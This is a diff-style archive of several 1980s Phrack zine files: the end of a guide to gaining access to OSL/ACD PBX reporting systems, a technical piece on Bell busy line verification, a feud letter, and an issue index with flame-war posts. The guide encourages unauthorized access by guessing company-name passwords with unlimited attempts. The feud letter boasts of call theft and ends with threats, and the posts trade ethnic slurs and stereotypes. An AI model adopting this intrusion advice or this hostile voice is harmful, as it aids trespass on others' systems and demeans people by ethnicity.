MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47
RELEASE 8003
OSL, PLEASE.
?
MARAUDER10292 is the system identification. Most of the time, this will
be the name of the company running the OSL system, but occasionally you
will find a system, you will not be able to identify. CN/A it. It might be
your only chance of gaining access to that particular system.
01/09/85. This is a mystery to me. It could be the time that the system
first went up (but sounds unlikely), the date of the current version of
the OSL operating system...etc.
The ^G is a Control-G, and rings a bell at your terminal. I do not know
why, but it does...
The rest of the text on that line is the current time and date.
RELEASE 8003 could be, again, the revision number of the software
package. I don't know.
OSL PLEASE means that you can now attempt to login.
The ? is your prompt. Remember the uppercase only. Naturally we are
going to type "OSL" to login. Once this is done, we will receive this
prompt:
KEY:
This is the password prompt, and so far as I can tell, can be anything
up to, say, 20 characters long. Obviously we are going to try MARAUDERS or
MARAUDER as a password. Here's the tricky part. Some systems do not tell
you whether the password was right or not. Sometimes, if it's right, you
will get a ? prompt again. If not, you will get an ERROR msg. It depends
on the system. Each system is set up a different way. Also, some systems
require all alphabetics, while others require alphanumerics and sometimes
they will require both. Again, you may or may not get an ERROR message.
You can ABORT anything at any time by sending a BREAK. One good thing
about the system is that you have, so far as I can tell, unlimited
attempts at guessing the "KEY". Also, Druidic Death says that "," is a
default, or is commonly used (I don't remember which). Unfortunately, I
have never been able to get this to work myself.
Your IN!:
Okay, first thing we need to do is type HELP. If you have access, which
again, differs from system to system, you will get a menu that looks like
so. (Maybe not, but I am through telling you how strange this system is.)
PLEASE ENTER ONE OF THE FOLLOWING COMMANDS
LREP - DISPLAY REPORT MENU
LST - LIST REPORT COMMANDS CURRENTLY STORED
ACD - ADD AN ACD COMMAND
DEL - DELETE AN ACD COMMAND
MOD - MODIFY AN ACD COMMAND
SUS - SUSPEND AN ACD COMMAND
ACT - ACTIVATE AN ACD COMMAND
LREP: This lists a menu of reports you can view.
LST : This lists all the commands that have been stored in the buffer.
ACD : This activates a command.
DEL : This deletes a command in the buffer.
MOD : This modifies a command in the buffer.
SUS : This suspends a command in the buffer.
ACT : This activates a command in the buffer.
Commands Explained:
Okay, so now we'll go through all of these commands and show you what they
do, and of course, explain each example.
LREP:
LREP lists a number of reports which can be ran. Here is an example:
REP# NAME SYNTAX
---- ---- ------
1 - CURRENT STATUS ACD 1,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
2 - CUMULATIVE STATUS ACD 2,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
3 - TRUNK DISPLAY GROUP ACD 3,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
4 - POSITON PERFORMANCE ACD 4,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
5 - ABBREVIATED AGENT ACD 5,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
6 - DAILY PROFILE ACD 6,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
7 - CUMULATIVE AGENT ACD 7,(FIRST),(LAST),(START),(INT),(#INT),(CLR),(REP)
Current Status : Gives you the current status of the PBX system.
Cumulative Status: Quite obvious.
Trunk Display Grp: Obvious again.
Position Prfrmnce: ???
Abbreviated Agent: ???
Daily Profile : Gives you a report of how the PBX ran on date 00/00/00.
Cumulative Agent : ???
ACD:
I purposely skipped all the other commands, since they are pretty obvious.
They all have to do with adding commands to the buffer, modifying them and
running them..etc. If you get access to a system, it would be wise to LST
all of the commands that the operators have been running and then try them
yourself. No biggy, but oh well. The ACD command activates a command and
lists the desired report on your terminal. While the whole thing can be
typed on one line, you can just type ACD <REPORT NUMBER> <CR> and do it
step by step (a little easier to get the hang of it). Now we'll go through
this, and show you an example of building a command to list the Trunk
Display Report.
?ACD 3
<CTRL-G>FIRST GP OR AGENT ID: (Try 1)
<CTRL-G>LAST GP OR AGENT ID: (Try 2)
START TIME: (Enter START TIME in army time such as 22:52:00)
INTERVAL: (Not sure, hit return)
# OF INTERVALS: (Not sure, hit return)
CLEAR(Y/N): (Type Y, but this is stored in the last cleared log)
REPEAT DAILY?: (No!)
PRINT LAST CLEARED(Y/N): (Here's where the last cleared shows up)
It then prints out the command and executes it, showing you the desired
report.
The end result:
Some other things can be done, such as commands like C and M and a host
of others, but unfortunately, as I said, these systems are very strange
and it's hard to find two alike. The computer is not worthless, and
lots of things can be done on it, but this file is getting quite lengthy.
If there is enough demand, I will write a follow-up. In the meantime, if I
have made any mistakes, or you have more knowledge that you would like to
share with me, I can be reached on the following boards:
ShadowSpawn Private, Hell Phrozen Over, Phantasie Realm and a few others.
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
\ /
/ An Evil Jay/Phrack, Inc. \
\ /
/ Presentation \
\ /
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-

180
phrack12/8.txt Normal file
View file

@ -0,0 +1,180 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #8 of 11
BUSY LINE VERIFICATION PART II
WRITTEN BY PHANTOM PHREAKER
This file is meant to be an addition to the first file that was included
in Phrack Inc. Issue XI. It is assumed that the reader has read and understood
the previous file. Most of this information will be taken from Bell System
Publications so you don't have to worry about it being incorrect.
First off, I'd like to correct a minor error included in the first file. I
use the format 'KP+0XX+PRE+SUFF+ST' to show the MF routing that is used. This
is not correct AT&T syntax though, the correct format is KP+0XX+NXX+XXXX+ST.
This is minor detail, but some people are very picky.
The Verification Network
------------------------
In a TSPS office, a verification circuit is associated with a 4-wire
OutGoing Trunk (OGT) and a 3-way/4-wire bridging repeater arrangement. This is
the circuit that does the speech scrambling. The speech and other tones (like
busy and re-order) are frequency shifted, but are still recognizable by a TSPS
operator.
TSPS verification trunks are connected via dedicated lines to incoming
verification trunks in a toll office. The toll office provides either a link
to an outgoing trunk and dedicated facilities to another toll office, or an
outgoing toll connecting trunk and dedicated facilities to an incoming
verification trunk in a local office. Each toll office has ways to check the
security of verification trunks. In electronic toll offices (ESS offices), two
independent office data translations provide security of the trunk. Electro-
mechanical toll offices (Such as a CrossBar Tandem (XBT)) use an electrical
cross-office check signal or a segregated switching train to control trunk
connections. Verification trunks relay supervisory signals (such as answering
supervision) to TSPS from the line being verified. Also, if verification
trunks are busy, the TSPS operator will receive a re-order.
The functions of the VFY key
----------------------------
When the operator presses the VFY key, several checks are made upon the
number that has been entered. These are:
A Check to see if the line is within the verification network accessible
by that particular TSPS. If the line is not, the VFY key will flash.
A check to see if the owner of the line wishes BLV to be possible or not.
If the line is something like a police emergency line, then the VFY key will
flash, similar to the first check.
Important TSPS keys
-------------------
When the VFY lamp lights steady (doesn't flash), indicating the process is
acceptable, the operator puts the calling customer on hold and accesses an
idle loop on the operator position. The ACS (Access) lamp lights steady if a
verification trunk is available at that time. Then, the operator presses the
ST key which sends out the complete number to be verified, in MF. The
verification circuit activates, and the operator listens for scrambled speech
and also watches the CLD (Called) lamp on her console. The CLD lamp is lighted
when the operator loop was accessed, and will remain lit if the line being
verified is on-hook. The operator has two ways of seeing if the line is in
use, by listening, and by watching the CLD lamp. If the CLD lamp light goes
out, then the line is off-hook.
If a successful BLV/EMER INT is performed, the operator presses the REC
MSG MSG (Record Message) key, which completes the verification. If the EMER
INT lamp is lit, the charges for the interrupt and the verification are
automatically billed. If the VFY key is pressed twice, it indicates the
verification should not be billed. This could be due to a customer error or a
customer disconnect.
Charging capabilities
---------------------
A customer can pay for a BLV/EMER INT in several ways. They can have the
charges put on their phone bill, if they are calling from their home, they can
bill the charges to an AT&T Calling Card, or pay directly from a coinphone.
Details of the BLV/EMER INT function are recorded on AMA tape, which is later
processed at the RAO (Revenue Accounting Office).
The classes of charge are as follows: STATION PAID, which means exactly
what it says, STATION SPECIAL CALLING, in cases where billing is handled by a
Calling Card or third number billing, and NO AMA, in unusual billing cases.
Also, for BLV/EMER INT calls that originate from a hotel, TSPS can send
charges to HOBIS (Hotel Billing Information System), HOBIC (Hotel Billing
Information Center), or a TTY at the hotel.
AMA records for BLV/EMER INT are recorded in basically the same format
that normal calls are recorded. The only difference is that a numeric data
group is added. The leftmost digit in the data group is a 1 if only a BLV was
done, but it is a 2 if both a BLV and an EMER INT were done. In case of an
aborted BLV, the billing record is marked 'No charge'.
Inward Operator differences
---------------------------
When an Inward operator does BLV/EMER INT, the class of charge is always
NO AMA, because billing is handled at the local TSPS site. Inwards also do not
use the REC MSG key when a TSPS would, they use the VFY key in it's place.
The Speech scrambling technique
-------------------------------
The speech scrambling technique that exists to keep the customers privacy
intact is located in the TSPS console, and not in the verification trunks. The
scrambling technique can only be deactivated by an operator pressing the EMER
INT key, or a craftsperson using the console in a special mode. When the
scrambler is deactivated by an operator doing an EMER INT, the customer hears
an alerting tone (as mentioned in the first BLV file) made up of a 440Hz tone.
This tone is initially played for two seconds, and then once every ten seconds
afterwards until the operator presses her Position Release (POS RLS) key.
Operator trouble reporting
--------------------------
When operators have trouble in handling a call, they can enter trouble
reports that are technically called 'Operator keyed trouble reports'. These
cause messages to be printed on the maintenance TTY and on the trouble report
TTY channel. There are different trouble codes for different things, such as
trouble with the speech scrambler, trouble in the verification network, or
trouble in collecting charges from a customer.
In my area there are 20 such TSPS trouble codes. These are done in MF.
They are entered with the KP TRBL (Key Pulse Trouble) key followed by a two
digit trouble code followed by an ST. A trouble code for beeper trouble could
be entered as KP TRBL+62+ST, and speech scrambler trouble could be KP
TRBL+89+ST. Some of the other reasons for trouble codes are: Crosstalk, No
ring, Noisy, can't hear, improper supervision toward the called and calling
parties, cutoff, positions crossed, coin collecting trouble, third re-order,
distant operator no answer, echo, data transmission, no answer supervision, ST
key lit for more than 4 seconds, and others for person-to-person and
station-to-station completed collect calls.
Maintenance and traffic measurements
------------------------------------
These reports can be output from a maintenance or engineering and service
data TTY, daily or hourly. Each daily report contains data for the previous
day. Some traffic counts are as follows:
Total Verification attempts, VFY key depressions, VFY key depressions when
the requested number is out of TSPS range, VFY key depressions in which the
requested number wasn't verifiable, BLV trunk seizures which pass an
operational test, and EMER INT attempts. Other traffic counts include the
measurements for usage of BLV trunks, the amount of time BLV trunks were
unavailable, and the number of times BLV trunks were seized.
I hope this file has helped people further understand how the BLV system
works. If you haven't read part I, get a copy of Phrack Inc. Issue XI and read
file #10.
As said earlier, most of this information comes directly from Bell System
Publications and so it should be viewed as correct. However, if you do find
any errors then please try to let me know about them so they can be corrected.
Suggested reading
-----------------
TSPS Part I: The console-Written by The Marauder, LOD/H Technical Journal
Issue No. 1, file #4
Busy Line Verification-Phrack Issue XI, file #10
Busy Verification Conference Circuit-Written by 414 Wizard
Verification-TAP issue 88, Written by Fred Steinbeck
Acknowledgements
----------------
Bell System Technical Journal, Vol. 59, No 8.
Bell Labs RECORD periodical
And the following people for contributing information in some form:
Mark Tabas, Doom Prophet, The Marauder

240
phrack12/9.txt Normal file
View file

@ -0,0 +1,240 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #9 of 11
Rebuttal to Phrack Issue 8 and 11 (File 11)
Written by Scan Man.....
It has been requested of Taran King (Who doesn't agree with KL on this subj)
to put this somewhere in the next issue of Phrack (12) for proper
distribution. Whether he does or not I cannot say.
Well a number of months have gone by now and I have been written about
accused of and had rebuttals written for me, all of which were about as clear
and factual as mud. And that includes the rebuttal that Telecomputist has in
effect tried to stand with me, and making matters only worse by inaccurate
information. But then all of this started with inaccurate information from
PWN, didn't it. KL has resorted to interfering in other peoples lives in order
to promote his so called news publication. To this I say, if you are going to
call it news then make it facts. I can buy the Enquirer if I want sensational-
istic readership boosting and inflated gossip. You do no justice to yourself
or your publication. I really shouldn't dignify any of this with comment but
shall as the entire matter has been blown so far out of proportion and since I
have been phreaking since these kiddies were still messing their diapers I
feel it a little more than an inconvenience, particularly since these
gentlemen (and I use the term loosely) can't seem to accomplish anything but
guesswork and conjecture and have cost me (and my wife and son) a $50,000 job
so the least I can do is get a few FACTS out.
First, I was (and I stress was) employed by a company called Telecom
Management Corporation. Notice the initials of this company (TMC). Telecom
Mgnt is a management company, and a management company manages other
companies. Among the companies it manages are 6 TMC Long Distance markets
(none of which are in Vegas), two of which are in Charleston where I live and
NY where I worked (up until two snotty nose teenagers (KL & SR) decided to
stick there nose where didn't belong). At any rate I was hired and paid by
Miami, lived in Charleston, and worked in NY. And yes with regard to your "he
must have been quite an asset to them," I was an asset to them. And KL you
seem to think it was surprising that they flew me to NY every week. I don't,
and I'm sure the other 100 businessmen on my flights who I traveled with
regularly would be surprised that they carried the unique distinction of being
somehow in the wrong for having their companies send them to NY every week.
I'll have to tell them this one for a good laff next time I get a 50,000
dollar a yr job that sends me to NY. Moving right along, I will add that I was
employed as a Systems Analyst. When I was originally hired, my interview was
by a fellow from Miami (Telecom Mgnt) and the interview was conducted in the
Chas office (one of the few times I was ever in there). This however doesn't
explain why Pauline Frazier and Ben Graves knew me or didn't care for me. The
reason for this was quite simple: they both knew about me and the bulletin
board and had also been trying to catch me stealing calls from there company
(don't know where they ever got that idea <grin>). At any rate they obviously
were quite unhappy because I got that job.
The next comment in rebut to Telecomputist which was a rebut to PWN Phrack
Issue 8 (what a nightmare), was, and I quote, "I claimed not to have any ties
with Vegas but didn't claim not to have ties with TMC." Boy talk about factual
journalism, really grabbing for straws aren't you. Anything to make me look
bad huh? Wonder why. Wouldn't be for more copies for your next issue would it?
As you could see at the beginning of this rebuttal I clearly stated that
Telecom Management ran 6 TMC markets as well as other companies and that they
were connected but separate from each other. Although none of it is relevant
to any of this, but that doesn't matter when you are out to get copies for
your next issue does it KL. At any rate this also shows where Telecomputist,
although trying to do a good thing, got their facts mixed up too by
misunderstanding the fact that Telecom Managements initials were the same as
TMC and were unrelated companies when actually they are.
In you next comments you say, "The rest of my statements are highly debatable"
(might try looking at a few (no make that all) of your own). You also said
that my statements have no proof (as if yours are so damn factual). First, I
don't have to prove a thing to assholes like you or anyone else for that
matter. You also state your decision (as if you have the right to make any
decisions about me, (shit boy you don't even know me, but you may soon) was to
do nothing because of lack of proof. And you call what you came up with truth?
Based on what, your vast personal knowledge of me, your knowledge of something
some phone phreak told you, because of having worked with me? As for providing
more ammunition to the idea, I'm not what I claim to be. I have claimed to be
nothing, it's you doing all the claiming. And there is no "ammunition" to be
had from the Telecomputist article as it was about as accurate as yours have
been. Shows you what two people who know nothing about nothing can do if they
put their minds to it. I might add that this is the first and last statement I
have personally written that has anything to do with any of this. You also
stated that, "after three months you had proof," yet you have shown only
words, not a speck of proof or truth. You have taken the Telecomputist article
apart and tried every way there was to tear it apart, most of which was
guesswork and innuendo. Examples of this are your quotes of, "Gee isn't that
awful expensive," "Notice how he didn't say he had no ties with TMC,"
"Statements were highly debatable," "Now that he has had a few months to come
up with a story," etc., that's some real facts there KL, you're a real
journalist who deals only with facts. You're not out for gossip or character
assassination. Riiiiiight. I've just been waiting for you to put your foot in
your mouth (in this case both feet). (Don't worry, I'm sure they will fit
nicely)
I think it's also time to tell the story of how all this got started. It's
really a comedy of errors (only I'm not laffing). As I stated earlier I was
paid by Miami, as that's where the home office was. This meant that on
occasion I also went to Miami as well as NY. In Dec of 85 I learned of a new
organization being formed called the CFCA (Communications Fraud Control
Association) although in addition to communications, they support computer and
credit security as well. Knowing that all the top security people were going
to be there and being a good phone phreak on the eternal quest for inside
knowledge, I wanted in on this conference which was held the 6th, 7th and 8th
of Feb 86 in Miami. Soooooo I convinced Telecom that we should check these
People out for some benefit to our company with regard to my job (Systems
Analyst) as after all it was my job to not only develop and operate the
companies' computers but keep them secure as well. So I had had the perfect
excuse to get me in the conference. They agreed with me and went for it and
paid for my flight down there and the conference fee. Moving right along, it
was the 1st day into the conference when just at lunch I was talking to a guy
from Pac NW Bell named Larry Algard (whose name I had forgotten til Sally Ride
showed up on the BBS saying Larry the Algardian had sent me a couple of weeks
later). At any rate while talking to this guy, a security agent from one of
the other LD companies that was there came up and said, "Aren't you Scan Man,
the guy that runs P-80?" Needless to say I about shit, and had to come up with
a damn good answer in about a 100th of a second. Knowing I was there legally
with the authority of my company, I answered back (in front of Larry Algard),
"Yes, but unbeknownst to my members it's an undercover board for TMC the
company I work for." And since Telecom Management Corporations initials were
TMC and they did manage 6 TMC LD companies I knew I was safe if he decided to
check me out, which I was worried about because earlier this same guy (the one
that said, "Aren't you Scan Man") had made a comment about the security of the
meeting and that he believed hackers had infiltrated the meeting. At any rate,
I was out of the fire with this guy and everyone (about 7 others) standing
around in our circle. It does however get worse. Two weeks later I got a new
user on the board named Sally Ride saying, "Larry The Algardian sent me" and
the msg subj was titled Scott Higginbotham. I answered the msg asking him
where he got that name (Scott Higginbotham, my real name) but he thought I
meant where did he get the name Larry the Algardian (see msg reprint below).
His reply is as follows (actual copy of msg)
Scan Man, I got the name from an electronic memo from Sec. Mgr. Larry Algard
to his boss, George Reay. Since I've access to these files via PNB's UNIX AOS,
I read about Algard's meeting with Scott at a CFCA Conf. in Miami. It's nice
to be able to know what the other side is up to, but how did you infiltrate
CFCA? I was able to infiltrate PNB Sec. thru their own system. But, to attend
such a meeting of the toll carriers of the nation and learn their plans to
combat us is a real coup! Understand where I'm coming from?
Sally Ride:::Space Cadet
Now from this msg you can see two things: first that Sally Ride is a two faced
little S.O.B., plus you can also see why he would think I was fed. I can
almost (again I stress almost) understand why he was suspicious. This msg also
points out that at least in his msgs to me he was of the opinion that I had
infiltrated the conference (not that his opinion about anything matters).
Then, on a social ladder climbing binge, he turns it around to me being one of
them (as if he was the only person in the world who could infiltrate
something). To this I say again, I was doing this when you were still in
diapers (SR). Even though I can legitimately understand why he would think I
was a fed as this at least "APPEARS" to be proof that I'm a fed, by that I
mean if I had broken into a telco security computer and found a msg saying
that so and so was running a sting board, I would be prone to believe it
myself. What Sally didn't know was that I had to say that at that conference
to keep from being fried myself when confronted by a security agent who
recognized me. But then what are the odds of someone breaking into the very
computer reading that very msg. If it were me and I was going to take this
information to the phreak community I would have to state the facts, which
were that he found this msg, "then print msg". I would not go into the
guessing that he and KL did in the original Phrack article (or this last one,
since the first obviously wasn't enough). But back to the point of all of
this, "WHAT WOULD YOU SAY STANDING IN THE MIDDLE OF 500 TOP TELCO SECURITY
PEOPLE AND ONE WALKS UP AND SAYS, "AREN'T YOU SO AND SO THAT RUNS SO AND SO
BBS?" See what I meant about a comedy of errors? Do you also see why
sometimes what is apparently the truth isn't always what it appears as. Do you
also see what I mean about gossip and poor journalism? This is not the first
time that Sally or KL has tried to distort facts and interfere with people's
lives. I am referring to the past David Lightman incident. Instead of
belaboring this point, I shall, in the fashion of the great journalists (KL &
SR), reprint another msg from Sally regarding this other incident in order to
show what kind of individual we are dealing with (a 19 yr old who if he spent
as much time hacking and phreaking as he does stretching the facts and butting
into peoples lives might be a good phreak/hack).
From: Sally Ride
Well a couple of things..first about Phrack World News..the above mentioned
article about Blade Runner and David Lightman was credited to David Lightman
and Blade Runner and someone else, maybe K.L. I really don't know either David
or Blade that well, but when someone is accused of being a cop, or a phone
cop, or whatever, I see no reason to keep that a secret from the phreak-world.
Everyone is able to make their own conclusions based on the information
provided and considering the sources. Finally, and I hope this ends all
discussion about this on the "Elite" section of this BBS. Is that what is
allowed for discussion here? Really, character assassination should be kept to
the War Room of some other K-Rad luzer BBS. Secondly, thanks to all who kept
me up to date on the status of the BBSes that had suddenly dropped out of
sight all for separate unrelated reasons. I found The Twilight Zone, now the
Septic Tank, it's back at 203-572-0015, old accounts intact. Taran King's
Metal Shop Private should be back up within hours of this message, see PWN 6
for the details. And Stronghold East is still down as far as I know, should be
back around 7/1. Broadway's always been weird but turning informant? Will
wonders never cease? And, TUC has a board again? And, here I thought he was a
"Security Consultant", per W.57th St. Who knows who's side who is on? Scan
Man, here's news from your neck of the woods. A company named Advanced
Information Management Inc. run by Robert Campbell. The June 23rd issue of
Communications Week says this guy and his 17 consultants are all over the BBS
world. They are based in Woodbridge, VA. Know anything about them? Sound like
some more narcs to worry about. What is the true story on Ralph Meola? PWN 6
says he's the head of AT&T Security. Has anyone ever heard of him before?
Sally Ride:::Space Cadet
I believe your words were, "character assassinations should be kept on some
k-rad Luzer war board" (try taking some of your own advice, or is it different
when it's your friend). You also made the statement that everyone should be
able to make their own decisions based on the sources. In my case it's two
guys that don't know me or really anything about me (KL & SR). Did anyone also
notice Sally's tendency toward a persecution complex? Everyone he mentioned in
the msg is thought to be a phone cop. I mean, really, take a good look at that
msg. It's quite obvious this boy is playing God and deciding who is and isn't
on who's side (you're not the only one who saves msgs). He's either attacked
or defended (mostly attacked or insinuated) about 5 people in one msg of being
the bad ole phone cop. Who set you two up as judge and jury? As to how I feel
about it, I'll use an old saying with a new twist, "If you want to hear the
jukebox, you damn well better have a quarter," better known as "pay the
piper". Does it sound like I'm upset? I mean how would you feel if you had
trouble keeping your family fed, heated, and housed because some asshole that
just hit puberty stuck their nose into your life. Tell your son, no he can't
go skating because you don't have the money because........etc.....Also I
might add that a number of us old guards who were phreaking before there were
computers and BBSes such as my old friend, Joe Engressia (Secrets of Little
Blue Box, Esquire 71) (avail P-80) and others have done actual security work
(not busting heads) defeating security systems on new payphones (test before
marketing) etc for yrs. I don't see anyone jumping up and yelling phone cop on
these guys. People who are admitted security people who also claim to be
phreaks are ignored. So why all the stink with me? In closing I would like to
say that I have little doubt that in their usual fashion KL and/or SR will
attempt to go over every word I have typed looking for more SO CALLED FACTS.
Any way you try to reword it will only be more twisting and supposition. Sooo
be my guest. You will get no more comments from me. The next time either of
you two hear from me, you better have your Quarter for the jukebox cause it
will be time to pay the piper.
P.S. KL do me a favor and call my board and let me know whether you will be at
this phreak conf in St Louis. If so I recommend old cloths, and clean
underwear.
(Oh yes and a quarter.)
Scan Man (3-10-87)

40
phrack13/1.txt Normal file
View file

@ -0,0 +1,40 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #1 of 10
Index...
~~~~~~~~
Well, as a tribute to April Fools Day (4/1/87) and as a break to the
normal grinding speed of Phrack Inc. (HA!), we at Phrack Inc. have taken a
break to be stupid, to get our frustrations out, to make fun of people,
places, and things, and to be just generally obnoxious.
This issue was delayed due to THE EXECUTIONER who may be blamed for
the slow date release of this issue. We currently believe him to be trekking
back to his home in the Himalayas to hide with his mom (Saskwatch). Heh...
Just getting you in the mood for what's ahead.
This issue is NOT to be taken seriously in any manner (except
anything mentioned about Oryan Quest) and is put together extremely loosely.
None of the files have been formatted. None of the files have been spell-
checked. Don't expect quality from this issue...just have fun. Later.
Taran King
Sysop of Metal Shop Private
------------------------------------------------------------------------------
Table of Contents:
#1 Phrack XIII Index by Taran King (2.0K)
#2 Real Phreaker's Guide Vol. 2 by Taran King and Knight Lightning (5.2K)
#3 How to Fuck Up the World - A Parody by Thomas Covenant (9.5K)
#4 How to Build a Paisley Box by Thomas Covenant and Double Helix (4.5K)
#5 Phreaks In Verse by Sir Francis Drake (3.1K)
#6 R.A.G. - Rodents Are Gay by Evil Jay (5.8K)
#7 Are You A Phone Geek? by Doom Prophet (8.8K)
#8 Computerists Underground News Tabloid - CUNT by Crimson Death (10.5K)
#9 RAGS - The Best of Sexy Exy (19.2K)
#10 Phrack World News XIII by Knight Lightning (26.0 K)
------------------------------------------------------------------------------

579
phrack13/10.txt Normal file
View file

@ -0,0 +1,579 @@
==Phrack Inc.==
Volume Two, Issue 13, Phile #10 of 10
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN *>=-{ Phrack World News }-=<* PWN
PWN ~~~~~~ ~~~~~ ~~~~ PWN
PWN Issue XIII PWN
PWN PWN
PWN Created, Written, and Edited PWN
PWN by Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Happy April Fool's Day and welcome to Issue Thirteen of Phrack World News. In
the spirit of April Fool's Day, this is the "rag" issue of PWN. And now we
take a look back and enjoy the most hilarious posts of the past year. These
posts were selected only because they were there and no one should take offense
at the material. Please note that not all posts are rags, which only goes to
prove that you don't have to rag to be funny.
[Some posts have been reformatted and edited for this presentation].
[Special thanks to Solid State]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Name: The Executioner #47
Date: 2:33 pm Fri Sep 12, 1986
Slave Driver > Do explain that message... I do NOT kiss anyone's ass except my
own because I am such an awesome studly dude. Something you would know nothing
about, being studly that is.
Master Vax, you are an utter bore who has nothing contributing to say. You are
so useless. When people say "Sexy-Exy", they say "Ragger Elite, good knowledge
and not too bad of a cosysop." When people say Circuit Breaker, they say
"who?????" . Face it, you are basically non-existent in the modem world. You
command nothing and you hang out with the lowest echelon like Dr. Doom who sat
there for about 10 minutes taking my abuse, making lame comments thinking he
was cool.
Anyway, this is a phreak/hack sub, not some rag board where I am allowed to
bug the hel out of you. And when it comes right down to it, I don't brag about
my knowledge, because "Those who proclaim their knowledge, proclaim their
ignorance".
-The Sexyest Executioner
Name: Dr. Doom #106
Date: 6:04 pm Fri Sep 12, 1986
Executioner...
Well, it seems that a little more than a week ago, it was 'Dr. Doom, we (PLP)
feel that you would be a valuable addition to our group and therefore are
extending an invitation to join the Phone Line Phantoms.' and then I told you
quite simply that I wasn't interested in joining PLR (Phone Line Raggers). NOW,
you are calling me voice just to rag on me and posting 'Dr. Doom the loser...'.
So, the other week you were kissing ass 'Dr. Doom join PLP....' , etc... and
now quite suddenly I have become a loser because I didn't join PLR.
Guy, I could in a few minutes come up with LOADS of stuph to say about you, but
since you carry no weight and are on some kind of an ego-trip I will let you go
off to Central Park and play Ninja with Broadway.
Dr. Doom
Name: Knight Lightning #2
Date: 12:49 am Sat Sep 13, 1986
This is getdhng good, its been a while since we saw a really heated battle on
here and you know why? Because those who start heated battles on this board
get deleted so either post good info or use the email or you won't be using
the system for anything any longer. In other words lets drop the bullshit
messages (like this one) use use this sub for what it was intended.
:Knight Lightning
Name: The Executioner #47
Date: 9:45 am Sat Sep 13, 1986
By the way, Dr. Doom, we thought you had some knowledge (at least TEL did).
When I read all 31+ files you wrote, which happened to come straight out of
manuals, I was not impressed. I am not ragging on you because you didn't join,
I am pointing out a harsh reality that you should face.
You are a peon compared to the monolithic stature of one such as I.
You are an amoeba compared to the complex genius person I am.
You are a pimple compared to the sexyness and looks such as I.
You are a clinging form of pig feces.
You throw absolutely NO weight around. No one cares about you or your bbs.
having absolutely no reputation, you proceed to write 31 files because you cry
at home fearing that no one likes you. And, I have composed a neat little tune
about you to the Beverly Hillbillies (Your ancestors)
Now listen to a story about a boy named Doom,
Poor Modem geek who would never leave his room.
Then one day he was talking on the phone,
When up in his pants came a miniature bone.
Penis that is, kind of like a toothpick.
Well the next thing you know old Doom has a board,
Running on a commie cuz it's all he can afford.
So now doom sits at home as happy as can be,
thinking he's cool he turns down PLP.
So now he thinks he happnin he thinks he's rad,
With his high pitched voice, god this boy is sad.
And this is the story about a dork named Doom,
Poor modem geek who DOESN'T want to leave his room.
Why?
Because your UGLY! D-O-O-M! (<-that was to Mickey Mouse)
The End.
The Executioner/PhoneLine Phantoms!
Name: Carrier Culprit #11
Date: 10:17 am Sat Sep 13, 1986
Heh. That was pretty cool. Doom you have no talent what so ever, I could pick
up a manual and start typing away. When data demon and I were talking to you
via 3 way you couldn't even answer some basic CCIS stuff. And Lover was the
only person who wanted you in the group, I hope he wasn't impressed by your
files (volume I, II, III, IV, V, etc.. heh). And if you think that all PLP
does is rag, well you must not know what's up in the world. And make up your
mind, you keep changing your group's name and bragging about turning down an
offer to be in PLP. Well, Doom my boy you told me your were going to drop
Metro Communications to join PLP until you saw Exy's rag on your so called
Commie 5 messages per sub board. Shit your board was up longer than Link, and
Link blows it away. Well, I really should stop this ragging because it's
pretty uncool, then again Doom is uncool. Anyway your group is gay in the
face!
--Culprit
MCI Communications
Sprint COM
950 Communications
I dunno Communications
Metro MEN!
Name: Dr. Doom #106
Date: 10:04 pm Sat Sep 13, 1986
Well, as some of you might have seen lately, certain people do not relish the
fact that I thought very little of them so they are attempting to slander my
good name by saying that I know nothing and that every file I have ever written
was copied from manuals. First of all, most files I have written do contain
some information that was origionally printed on some Bell or AT&T document,
because they relate to such things as ISDN, but by NO means are they copied
from manuals in any way.
Mikie, that was a rather amusing song, but in no way did anything in it come
close to possibly reflecting me. I mean it is nice that you want to tell
everybody about your life and all, but you really should not try to
self-project your tragedies on someone else. If you need help trying to come
up with some auto-biographical titles about yourself, you should try :
'The Life and Times of a PLP Loser Named Mikie Chow Ding Dong Dung.'
Oh, did you call me UGLY? that is quite far from the truth. Look at you,
someone who as a child could use dental floss as a blindfold. calling me UGLY?
Humor me more Mr. 'UGLY' Chinaman who writes files on 'Beauty Techniques'.
Face it, some people are just born naturally handsome and don't need make up to
disquise their grotesque features like you do.
Since you think you are SO tough, you are cordially invited to come down here
to Texas where talk is cheap and doesn't mean shit. (Don't forget to bring
your throwing star collection....'
Dr. Doom
Name: The Executioner #47
Date: 10:18 am Sun Sep 14, 1986
Doom, Spare me your lame tongue flapping and breath exhultation that only makes
you look like the fuckoid you are. People have met me, people know that what I
say is all backed up and all true. Who has met you? No one has met you so you
can fling all the bullshit you want. When I say I am gorgeous, the people who
have met me can always say, "I've met you and you are a dork". But do they?
No, because I am not a dork unlike yourself.
I don't know where you get the idea that I am some karate dude, because I am
not, and don't even care to be. Unless you are stereotyping all of us
orientals like that, showing that you are in an ignorant chunk of muleflesh.
And I could stereotype you, the polish, born of blue collar trash collectors.
I am sure you go bowling and have bowling trophies mounted in glass cases in
your cardboard house. How is that dirt floor? How is the bearskin door? I
know you are of low social stature and therefore do not know or even comprehend
the social elegance that I am born and bred in. So you can just take you and
your $20000 income that your family makes and just save it for someone who is
at your level.
Is it true that the welfare lines are long?
How was the goverment cheese giveaway?
The Sexyest Executioner
Name: >UNKNOWN<
Date: <-> INACTIVE <->
As someone else already said: Please spare the rest of us users the pain of
having to hit the space bar whenever the author of the message is 'Dr. Doom'
or 'The Executioner', or whatever. Geez...
